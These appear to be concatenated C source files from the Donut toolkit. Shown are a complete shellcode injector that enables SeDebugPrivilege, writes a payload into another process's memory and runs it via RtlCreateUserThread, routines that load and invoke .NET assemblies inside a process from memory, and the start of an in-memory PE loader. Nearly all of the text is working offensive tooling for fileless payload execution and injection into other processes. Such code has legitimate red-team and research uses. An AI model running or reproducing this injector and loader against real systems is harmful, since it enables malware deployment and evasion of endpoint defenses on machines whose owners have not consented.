188 | DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac); | |
189 | ||
190 | if(mac != mod->mac) { | |
191 | DPRINT("Decryption failed"); | |
192 | return FALSE; | |
193 | } | |
194 | } | |
195 | #endif | |
196 | return bResult; | |
197 | }⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <Windows.h> | |
32 | #include <stdio.h> | |
33 | #include <tlhelp32.h> | |
34 | ||
35 | #pragma comment(lib, "advapi32.lib") | |
36 | #pragma comment(lib, "shell32.lib") | |
37 | #pragma comment(lib, "user32.lib") | |
38 | ||
39 | typedef struct _CLIENT_ID { | |
40 | PVOID UniqueProcess; | |
41 | PVOID UniqueThread; | |
42 | } CLIENT_ID, *PCLIENT_ID; | |
43 | ||
44 | typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) ( | |
45 | IN HANDLE ProcessHandle, | |
46 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, | |
47 | IN BOOLEAN CreateSuspended, | |
48 | IN ULONG StackZeroBits, | |
49 | IN OUT PULONG StackReserved, | |
50 | IN OUT PULONG StackCommit, | |
51 | IN PVOID StartAddress, | |
52 | IN PVOID StartParameter OPTIONAL, | |
53 | OUT PHANDLE ThreadHandle, | |
54 | OUT PCLIENT_ID ClientID); | |
55 | ||
56 | BOOL EnablePrivilege(PCHAR szPrivilege){ | |
57 | HANDLE hToken; | |
58 | BOOL bResult; | |
59 | LUID luid; | |
60 | TOKEN_PRIVILEGES tp; | |
61 | ||
62 | // open token for current process | |
63 | bResult = OpenProcessToken(GetCurrentProcess(), | |
64 | TOKEN_ADJUST_PRIVILEGES, &hToken); | |
65 | ||
66 | if(!bResult) return FALSE; | |
67 | ||
68 | // lookup privilege | |
69 | bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid); | |
70 | if(bResult){ | |
71 | tp.PrivilegeCount = 1; | |
72 | tp.Privileges[0].Luid = luid; | |
73 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; | |
74 | ||
75 | // adjust token | |
76 | bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL); | |
77 | } | |
78 | CloseHandle(hToken); | |
79 | return bResult; | |
80 | } | |
81 | ||
82 | // display error message for last error code | |
83 | VOID xstrerror (PCHAR fmt, ...){ | |
84 | PCHAR error=NULL; | |
85 | va_list arglist; | |
86 | CHAR buffer[1024]; | |
87 | DWORD dwError=GetLastError(); | |
88 | ||
89 | va_start(arglist, fmt); | |
90 | vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist); | |
91 | va_end (arglist); | |
92 | ||
93 | if (FormatMessage ( | |
94 | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, | |
95 | NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), | |
96 | (LPSTR)&error, 0, NULL)) | |
97 | { | |
98 | printf(" [ %s : %s\n", buffer, error); | |
99 | LocalFree (error); | |
100 | } else { | |
101 | printf(" [ %s error : %08lX\n", buffer, dwError); | |
102 | } | |
103 | } | |
104 | ||
105 | DWORD name2pid(PCHAR procName){ | |
106 | HANDLE hSnap; | |
107 | PROCESSENTRY32 pe32; | |
108 | DWORD pid=0; | |
109 | ||
110 | // create snapshot of system | |
111 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
112 | if(hSnap == INVALID_HANDLE_VALUE) return 0; | |
113 | ||
114 | pe32.dwSize = sizeof(PROCESSENTRY32); | |
115 | ||
116 | // get first process | |
117 | if(Process32First(hSnap, &pe32)){ | |
118 | do { | |
119 | if(!lstrcmpi(pe32.szExeFile, procName)){ | |
120 | pid=pe32.th32ProcessID; | |
121 | break; | |
122 | } | |
123 | } while(Process32Next(hSnap, &pe32)); | |
124 | } | |
125 | CloseHandle(hSnap); | |
126 | return pid; | |
127 | } | |
128 | ||
129 | BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) { | |
130 | SIZE_T wr; | |
131 | HANDLE hp,ht; | |
132 | LPVOID cs; | |
133 | RtlCreateUserThread_t pRtlCreateUserThread; | |
134 | HMODULE hn; | |
135 | CLIENT_ID cid; | |
136 | NTSTATUS nt=~0UL; | |
137 | DWORD t; | |
138 | ||
139 | // 1. resolve API address | |
140 | hn = GetModuleHandle("ntdll.dll"); | |
141 | pRtlCreateUserThread=(RtlCreateUserThread_t) | |
142 | GetProcAddress(hn, "RtlCreateUserThread"); | |
143 | ||
144 | printf(" [ opening process %li\n", id); | |
145 | // 2. open the target process | |
146 | hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id); | |
147 | ||
148 | if(hp == NULL) return FALSE; | |
149 | ||
150 | // 3. allocate executable-read-write (XRW) memory for payload | |
151 | printf(" [ allocating memory for payload.\n"); | |
152 | cs=VirtualAllocEx(hp, NULL, codeLen, | |
153 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
154 | ||
155 | printf(" [ writing code to %p.\n", cs); | |
156 | // 4. copy the payload to remote memory | |
157 | WriteProcessMemory(hp, cs, code, codeLen, &wr); | |
158 | VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t); | |
159 | ||
160 | printf(" [ press any key to continue.\n"); | |
161 | getchar(); | |
162 | ||
163 | // 5. execute payload in remote process | |
164 | printf(" [ creating new thread.\n"); | |
165 | nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, | |
166 | NULL, cs, NULL, &ht, &cid); | |
167 | ||
168 | printf(" [ nt status is %lx\n", nt); | |
169 | WaitForSingleObject(ht, INFINITE); | |
170 | ||
171 | // 6. close remote thread handle | |
172 | CloseHandle(ht); | |
173 | ||
174 | // 7. free remote memory | |
175 | printf(" [ freeing memory.\n"); | |
176 | VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT); | |
177 | ||
178 | // 8. close remote process handle | |
179 | CloseHandle(hp); | |
180 | return nt == 0; // STATUS_SUCCESS | |
181 | } | |
182 | ||
183 | DWORD getdata(PCHAR path, LPVOID *data){ | |
184 | HANDLE hf; | |
185 | DWORD len,rd=0; | |
186 | ||
187 | // 1. open the file | |
188 | hf=CreateFile(path, GENERIC_READ, 0, 0, | |
189 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); | |
190 | ||
191 | if(hf!=INVALID_HANDLE_VALUE){ | |
192 | // get file size | |
193 | len=GetFileSize(hf, 0); | |
194 | // allocate memory | |
195 | *data=malloc(len + 16); | |
196 | // read file contents into memory | |
197 | ReadFile(hf, *data, len, &rd, 0); | |
198 | CloseHandle(hf); | |
199 | } | |
200 | return rd; | |
201 | } | |
202 | ||
203 | int main(int argc, char *argv[]){ | |
204 | LPVOID code; | |
205 | SIZE_T code_len; | |
206 | DWORD pid; | |
207 | ||
208 | if (argc != 3){ | |
209 | printf("\n [ usage: inject <process id | process name> <payload.bin>\n"); | |
210 | return 0; | |
211 | } | |
212 | ||
213 | if(!EnablePrivilege(SE_DEBUG_NAME)) { | |
214 | printf(" [ cannot enable SeDebugPrivilege.\n"); | |
215 | } | |
216 | ||
217 | // get pid | |
218 | pid=atoi(argv[1]); | |
219 | if(pid==0) pid=name2pid(argv[1]); | |
220 | ||
221 | if(pid==0) { | |
222 | printf(" [ unable to obtain process id.\n"); | |
223 | return 0; | |
224 | } | |
225 | // pic | |
226 | code_len = getdata(argv[2], &code); | |
227 | if(code_len == 0) { | |
228 | printf(" [ unable to read payload.\n"); | |
229 | return 0; | |
230 | } | |
231 | injectPIC(pid, code, code_len); | |
232 | free(code); | |
233 | return 0; | |
234 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) { | |
32 | PDONUT_MODULE mod; | |
33 | HRESULT hr = S_OK; | |
34 | BSTR domain; | |
35 | SAFEARRAYBOUND sab; | |
36 | SAFEARRAY *sa; | |
37 | DWORD i; | |
38 | BOOL loaded=FALSE, loadable; | |
39 | PBYTE p; | |
40 | ||
41 | if(inst->type == DONUT_INSTANCE_PIC) { | |
42 | DPRINT("Using module embedded in instance"); | |
43 | mod = (PDONUT_MODULE)&inst->module.x; | |
44 | } else { | |
45 | DPRINT("Loading module from allocated memory"); | |
46 | mod = inst->module.p; | |
47 | } | |
48 | ||
49 | if(inst->api.CLRCreateInstance != NULL) { | |
50 | DPRINT("CLRCreateInstance"); | |
51 | ||
52 | hr = inst->api.CLRCreateInstance( | |
53 | (REFCLSID)&inst->xCLSID_CLRMetaHost, | |
54 | (REFIID)&inst->xIID_ICLRMetaHost, | |
55 | (LPVOID*)&pa->icmh); | |
56 | ||
57 | if(SUCCEEDED(hr)) { | |
58 | DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime); | |
59 | ||
60 | hr = pa->icmh->lpVtbl->GetRuntime( | |
61 | pa->icmh, mod->runtime, | |
62 | (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri); | |
63 | ||
64 | if(SUCCEEDED(hr)) { | |
65 | DPRINT("ICLRRuntimeInfo::IsLoadable"); | |
66 | hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable); | |
67 | ||
68 | if(SUCCEEDED(hr) && loadable) { | |
69 | DPRINT("ICLRRuntimeInfo::GetInterface"); | |
70 | ||
71 | hr = pa->icri->lpVtbl->GetInterface( | |
72 | pa->icri, | |
73 | (REFCLSID)&inst->xCLSID_CorRuntimeHost, | |
74 | (REFIID)&inst->xIID_ICorRuntimeHost, | |
75 | (LPVOID)&pa->icrh); | |
76 | ||
77 | DPRINT("HRESULT: %08lx", hr); | |
78 | } | |
79 | } else pa->icri = NULL; | |
80 | } else pa->icmh = NULL; | |
81 | } | |
82 | if(FAILED(hr)) { | |
83 | DPRINT("CorBindToRuntime"); | |
84 | ||
85 | hr = inst->api.CorBindToRuntime( | |
86 | NULL, // load whatever's available | |
87 | NULL, // load workstation build | |
88 | &inst->xCLSID_CorRuntimeHost, | |
89 | &inst->xIID_ICorRuntimeHost, | |
90 | (LPVOID*)&pa->icrh); | |
91 | ||
92 | DPRINT("HRESULT: %08lx", hr); | |
93 | } | |
94 | ||
95 | if(FAILED(hr)) { | |
96 | pa->icrh = NULL; | |
97 | return FALSE; | |
98 | } | |
99 | DPRINT("ICorRuntimeHost::Start"); | |
100 | ||
101 | hr = pa->icrh->lpVtbl->Start(pa->icrh); | |
102 | ||
103 | if(SUCCEEDED(hr)) { | |
104 | domain = inst->api.SysAllocString(mod->domain); | |
105 | ||
106 | DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain); | |
107 | ||
108 | hr = pa->icrh->lpVtbl->CreateDomain( | |
109 | pa->icrh, domain, NULL, &pa->iu); | |
110 | ||
111 | inst->api.SysFreeString(domain); | |
112 | ||
113 | if(SUCCEEDED(hr)) { | |
114 | DPRINT("IUnknown::QueryInterface"); | |
115 | ||
116 | hr = pa->iu->lpVtbl->QueryInterface( | |
117 | pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad); | |
118 | ||
119 | if(SUCCEEDED(hr)) { | |
120 | sab.lLbound = 0; | |
121 | sab.cElements = mod->len; | |
122 | sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab); | |
123 | ||
124 | if(sa != NULL) { | |
125 | DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len); | |
126 | ||
127 | for(i=0, p=sa->pvData; i<mod->len; i++) { | |
128 | p[i] = mod->data[i]; | |
129 | } | |
130 | ||
131 | DPRINT("AppDomain::Load_3"); | |
132 | ||
133 | hr = pa->ad->lpVtbl->Load_3( | |
134 | pa->ad, sa, &pa->as); | |
135 | ||
136 | loaded = hr == S_OK; | |
137 | ||
138 | DPRINT("HRESULT : %08lx", hr); | |
139 | ||
140 | DPRINT("Erasing assembly from memory"); | |
141 | ||
142 | for(i=0, p=sa->pvData; i<mod->len; i++) { | |
143 | p[i] = mod->data[i] = 0; | |
144 | } | |
145 | ||
146 | DPRINT("SafeArrayDestroy"); | |
147 | inst->api.SafeArrayDestroy(sa); | |
148 | } | |
149 | } | |
150 | } | |
151 | } | |
152 | return loaded; | |
153 | } | |
154 | ||
155 | BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) { | |
156 | SAFEARRAY *sav=NULL, *params=NULL; | |
157 | VARIANT arg, ret, vtPsa, v1={0}, v2; | |
158 | DWORD i; | |
159 | PDONUT_MODULE mod; | |
160 | HRESULT hr; | |
161 | BSTR cls, method; | |
162 | ULONG cnt; | |
163 | OLECHAR str[1]={0}; | |
164 | LONG ucnt, lcnt; | |
165 | ||
166 | if(inst->type == DONUT_INSTANCE_PIC) { | |
167 | DPRINT("Using module embedded in instance"); | |
168 | mod = (PDONUT_MODULE)&inst->module.x; | |
169 | } else { | |
170 | DPRINT("Loading module from allocated memory"); | |
171 | mod = inst->module.p; | |
172 | } | |
173 | ||
174 | DPRINT("Type is %s", | |
175 | mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE"); | |
176 | ||
177 | // if this is a program | |
178 | if(mod->type == DONUT_MODULE_NET_EXE) { | |
179 | // get the entrypoint | |
180 | DPRINT("MethodInfo::EntryPoint"); | |
181 | hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi); | |
182 | ||
183 | if(SUCCEEDED(hr)) { | |
184 | // get the parameters for entrypoint | |
185 | DPRINT("MethodInfo::GetParameters"); | |
186 | hr = pa->mi->lpVtbl->GetParameters(pa->mi, ¶ms); | |
187 | ||
188 | if(SUCCEEDED(hr)) { | |
189 | DPRINT("SafeArrayGetLBound"); | |
190 | hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt); | |
191 | ||
192 | DPRINT("SafeArrayGetUBound"); | |
193 | hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt); | |
194 | cnt = ucnt - lcnt + 1; | |
195 | DPRINT("Number of parameters for entrypoint : %i", cnt); | |
196 | ||
197 | // does Main require string[] args? | |
198 | if(cnt != 0) { | |
199 | // create a 1 dimensional array for Main parameters | |
200 | sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1); | |
201 | // if user specified their own parameters, add to string array | |
202 | if(mod->param_cnt != 0) { | |
203 | // create 1 dimensional array for strings[] args | |
204 | vtPsa.vt = (VT_ARRAY | VT_BSTR); | |
205 | vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt); | |
206 | ||
207 | // add each string parameter | |
208 | for(i=0; i<mod->param_cnt; i++) { | |
209 | DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1)); | |
210 | ||
211 | inst->api.SafeArrayPutElement(vtPsa.parray, | |
212 | &i, inst->api.SysAllocString(mod->param[i])); | |
213 | } | |
214 | } else { | |
215 | DPRINT("Adding empty string for invoke_3"); | |
216 | // add empty string to make it work | |
217 | // create 1 dimensional array for strings[] args | |
218 | vtPsa.vt = (VT_ARRAY | VT_BSTR); | |
219 | vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1); | |
220 | ||
221 | i=0; | |
222 | inst->api.SafeArrayPutElement(vtPsa.parray, | |
223 | &i, inst->api.SysAllocString(str)); | |
224 | } | |
225 | // add string array to list of parameters | |
226 | i=0; | |
227 | inst->api.SafeArrayPutElement(sav, &i, &vtPsa); | |
228 | } | |
229 | v1.vt = VT_NULL; | |
230 | v1.plVal = NULL; | |
231 | ||
232 | DPRINT("MethodInfo::Invoke_3()\n"); | |
233 | ||
234 | hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2); | |
235 | ||
236 | DPRINT("MethodInfo::Invoke_3 : %08lx : %s", | |
237 | hr, SUCCEEDED(hr) ? "Success" : "Failed"); | |
238 | ||
239 | if(sav != NULL) { | |
240 | inst->api.SafeArrayDestroy(vtPsa.parray); | |
241 | inst->api.SafeArrayDestroy(sav); | |
242 | } | |
243 | } | |
244 | } else pa->mi = NULL; | |
245 | } else { | |
246 | DPRINT("SysAllocString(\"%ws\")", mod->cls); | |
247 | cls = inst->api.SysAllocString(mod->cls); | |
248 | if(cls == NULL) return FALSE; | |
249 | ||
250 | DPRINT("SysAllocString(\"%ws\")", mod->method); | |
251 | method = inst->api.SysAllocString(mod->method); | |
252 | ||
253 | if(method != NULL) { | |
254 | DPRINT("Assembly::GetType_2"); | |
255 | hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type); | |
256 | ||
257 | if(SUCCEEDED(hr)) { | |
258 | sav = NULL; | |
259 | if(mod->param_cnt != 0) { | |
260 | DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt); | |
261 | ||
262 | sav = inst->api.SafeArrayCreateVector( | |
263 | VT_VARIANT, 0, mod->param_cnt); | |
264 | ||
265 | if(sav != NULL) { | |
266 | for(i=0; i<mod->param_cnt; i++) { | |
267 | DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1)); | |
268 | ||
269 | V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]); | |
270 | V_VT(&arg) = VT_BSTR; | |
271 | ||
272 | hr = inst->api.SafeArrayPutElement(sav, &i, &arg); | |
273 | ||
274 | if(FAILED(hr)) { | |
275 | DPRINT("SafeArrayPutElement failed."); | |
276 | inst->api.SafeArrayDestroy(sav); | |
277 | sav = NULL; | |
278 | } | |
279 | } | |
280 | } | |
281 | } | |
282 | if(SUCCEEDED(hr)) { | |
283 | DPRINT("Calling Type::InvokeMember_3"); | |
284 | ||
285 | hr = pa->type->lpVtbl->InvokeMember_3( | |
286 | pa->type, | |
287 | method, // name of method | |
288 | BindingFlags_InvokeMethod | | |
289 | BindingFlags_Static | | |
290 | BindingFlags_Public, | |
291 | NULL, | |
292 | v1, // empty VARIANT | |
293 | sav, // arguments to method | |
294 | &ret); // return code from method | |
295 | ||
296 | DPRINT("Type::InvokeMember_3 : %08lx : %s", | |
297 | hr, SUCCEEDED(hr) ? "Success" : "Failed"); | |
298 | ||
299 | if(sav != NULL) { | |
300 | inst->api.SafeArrayDestroy(sav); | |
301 | } | |
302 | } | |
303 | } | |
304 | inst->api.SysFreeString(method); | |
305 | } | |
306 | inst->api.SysFreeString(cls); | |
307 | } | |
308 | return TRUE; | |
309 | } | |
310 | ||
311 | VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) { | |
312 | ||
313 | if(pa->type != NULL) { | |
314 | DPRINT("Type::Release"); | |
315 | pa->type->lpVtbl->Release(pa->type); | |
316 | pa->type = NULL; | |
317 | } | |
318 | ||
319 | if(pa->mi != NULL) { | |
320 | DPRINT("MethodInfo::Release"); | |
321 | pa->mi->lpVtbl->Release(pa->mi); | |
322 | pa->mi = NULL; | |
323 | } | |
324 | ||
325 | if(pa->as != NULL) { | |
326 | DPRINT("Assembly::Release"); | |
327 | pa->as->lpVtbl->Release(pa->as); | |
328 | pa->as = NULL; | |
329 | } | |
330 | ||
331 | if(pa->ad != NULL) { | |
332 | DPRINT("AppDomain::Release"); | |
333 | pa->ad->lpVtbl->Release(pa->ad); | |
334 | pa->ad = NULL; | |
335 | } | |
336 | ||
337 | if(pa->iu != NULL) { | |
338 | DPRINT("IUnknown::Release"); | |
339 | pa->iu->lpVtbl->Release(pa->iu); | |
340 | pa->iu = NULL; | |
341 | } | |
342 | ||
343 | if(pa->icrh != NULL) { | |
344 | DPRINT("ICorRuntimeHost::Stop"); | |
345 | pa->icrh->lpVtbl->Stop(pa->icrh); | |
346 | ||
347 | DPRINT("ICorRuntimeHost::Release"); | |
348 | pa->icrh->lpVtbl->Release(pa->icrh); | |
349 | pa->icrh = NULL; | |
350 | } | |
351 | ||
352 | if(pa->icri != NULL) { | |
353 | DPRINT("ICLRRuntimeInfo::Release"); | |
354 | pa->icri->lpVtbl->Release(pa->icri); | |
355 | pa->icri = NULL; | |
356 | } | |
357 | ||
358 | if(pa->icmh != NULL) { | |
359 | DPRINT("ICLRMetaHost::Release"); | |
360 | pa->icmh->lpVtbl->Release(pa->icmh); | |
361 | pa->icmh = NULL; | |
362 | } | |
363 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifdef _WIN64 | |
32 | #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64 | |
33 | #else | |
34 | #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW | |
35 | #endif | |
36 | ||
37 | typedef struct _IMAGE_RELOC { | |
38 | WORD offset :12; | |
39 | WORD type :4; | |
40 | } IMAGE_RELOC, *PIMAGE_RELOC; | |
41 | ||
42 | typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); | |
43 | typedef VOID (WINAPI *Start_t)(VOID); | |
44 | ||
45 | typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]); | |
46 | ||
47 | // same as strcmp | |
48 | int xstrcmp(char *s1, char *s2) { | |
49 | while(*s1 && (*s1==*s2))s1++,s2++; | |
50 | return (int)*(unsigned char*)s1 - *(unsigned char*)s2; | |
51 | } | |
52 | ||
53 | // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem.. | |
54 | VOID RunPE(PDONUT_INSTANCE inst) { | |
55 | PIMAGE_DOS_HEADER dos, doshost; | |
56 | PIMAGE_NT_HEADERS nt, nthost; | |
57 | PIMAGE_SECTION_HEADER sh; | |
58 | PIMAGE_THUNK_DATA oft, ft; | |
59 | PIMAGE_IMPORT_BY_NAME ibn; | |
60 | PIMAGE_IMPORT_DESCRIPTOR imp; | |
61 | PIMAGE_EXPORT_DIRECTORY exp; | |
62 | PIMAGE_RELOC list; | |
63 | PIMAGE_BASE_RELOCATION ibr; | |
64 | DWORD rva; | |
65 | PDWORD adr; | |
66 | PDWORD sym; | |
67 | PWORD ord; | |
68 | PBYTE ofs; | |
69 | PCHAR str, name; | |
70 | HMODULE dll; | |
71 | ULONG_PTR ptr; | |
72 | DllMain_t DllMain; // DLL | |
73 | Start_t Start; // EXE | |
74 | call_stub_t CallApi; // DLL function | |
75 | LPVOID cs = NULL, base, host; | |
76 | DWORD i, cnt; | |
77 | PDONUT_MODULE mod; | |
78 | FARPROC api=NULL; // DLL export | |
79 | ||
80 | // write shellcode to stack. msvc sux!! | |
81 | #include "call_api_bin.h" | |
82 | ||
83 | if(inst->type == DONUT_INSTANCE_PIC) { | |
84 | DPRINT("Using module embedded in instance"); | |
85 | mod = (PDONUT_MODULE)&inst->module.x; | |
86 | } else { | |
87 | DPRINT("Loading module from allocated memory"); | |
88 | mod = inst->module.p; | |
89 | } | |
90 | ||
91 | base = mod->data; | |
92 | dos = (PIMAGE_DOS_HEADER)base; | |
93 | nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); | |
94 | ||
95 | // before doing anything. check compatibility between exe/dll and host process. | |
96 | host = inst->api.GetModuleHandle(NULL); | |
97 | doshost = (PIMAGE_DOS_HEADER)host; | |
98 | nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew); | |
99 | ||
100 | if(nt->FileHeader.Machine != nthost->FileHeader.Machine) { | |
101 | DPRINT("Host process and payload are not compatiable...cannot load."); | |
102 | return; | |
103 | } | |
104 | ||
105 | DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file", | |
106 | nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage); | |
107 | ||
108 | cs = inst->api.VirtualAlloc( | |
109 | NULL, nt->OptionalHeader.SizeOfImage + 4096, | |
110 | MEM_COMMIT | MEM_RESERVE, | |
111 | PAGE_EXECUTE_READWRITE); | |
112 | ||
113 | if(cs == NULL) return; | |
114 | ||
115 | DPRINT("Copying each section to RWX memory %p", cs); | |
116 | sh = IMAGE_FIRST_SECTION(nt); | |
117 | ||
118 | for(i=0; i<nt->FileHeader.NumberOfSections; i++) { | |
119 | Memcpy((PBYTE)cs + sh[i].VirtualAddress, | |
120 | (PBYTE)base + sh[i].PointerToRawData, | |
121 | sh[i].SizeOfRawData); | |
122 | } | |
123 | ||
124 | DPRINT("Processing the Import Table"); | |
125 | rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; | |
